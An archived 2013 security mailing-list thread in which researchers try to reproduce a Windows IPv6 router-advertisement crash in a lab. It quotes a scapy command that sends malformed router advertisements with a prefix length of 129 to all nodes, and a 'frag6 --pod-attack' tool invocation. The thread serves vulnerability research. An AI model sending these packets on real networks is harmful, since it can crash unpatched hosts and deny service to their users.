[ipv6hackers] Windows ping6-of-death

[Marc Heuse]

Hi Johannes,

try
  frag6 --pod-attack

(and before, if necessary, "git pull; make" ;-) )

Greets,
Marc

On 14.08.2013 13:37, Johannes Weber wrote:
> Hey,
>
> I just tried the scapy command from Pierre in my IPv6 laboratory but it has not
> crashed the Windows 7 machine (which is of course not yet patched). I saw the RA
> with Wireshark on the Windows machine, but no crash.
> I also tried the --pod-attack from Fernando, but icmp6 says "unrecognized
> option". How should I test this option correctly?
>
> Regards,
>
> Johannes
>
>
>> Pierre Emeriaud <petrus.lt at gmail.com> hat am 14. August 2013 um 10:49
>> geschrieben:
>>
>>
>> 2013/8/14 Fernando Gont <fgont at si6networks.com>:
>>> Ironically enough, they are vulnerable to attack because they don't
>>> enforce sanity checks, and the ra6 tool of the IPv6-Toolkit cannot
>>> exploit this attack because it enforces sanity checks on the Prefix
>>> lenghts given by the user. :-)
>> I tried to send the following frame with scapy. It was sent correctly
>> but unfortunately I don't have any Windows boxen to test it:
>>>>> sendp(Ether()/IPv6(dst="ff02::1")/ICMPv6ND_RA()/ICMPv6NDOptPrefixInfo(prefix="2001:db8:bad:cafe::",prefixlen=129),
>>>>> loop=1, inter=0.5)
>> The incorrect prefix length was seen on the wire, but I don't know if
>> that would be enough to exploit the vuln.
>>
>>
>> Regards,
>> Pierre.
>> _______________________________________________
>> Ipv6hackers mailing list
>> Ipv6hackers at lists.si6networks.com
>> http://lists.si6networks.com/listinfo/ipv6hackers
>>
> _______________________________________________
> Ipv6hackers mailing list
> Ipv6hackers at lists.si6networks.com
> http://lists.si6networks.com/listinfo/ipv6hackers
>

-- 
--
Marc Heuse
Mobil: +49 177 9611560
Fax: +49 30 37309726
www.mh-sec.de

Marc Heuse - IT-Security Consulting
Winsstr. 68
10405 Berlin

Ust.-Ident.-Nr.: DE244222388
PGP: FEDD 5B50 C087 F8DF 5CB9  876F 7FDD E533 BF4F 891A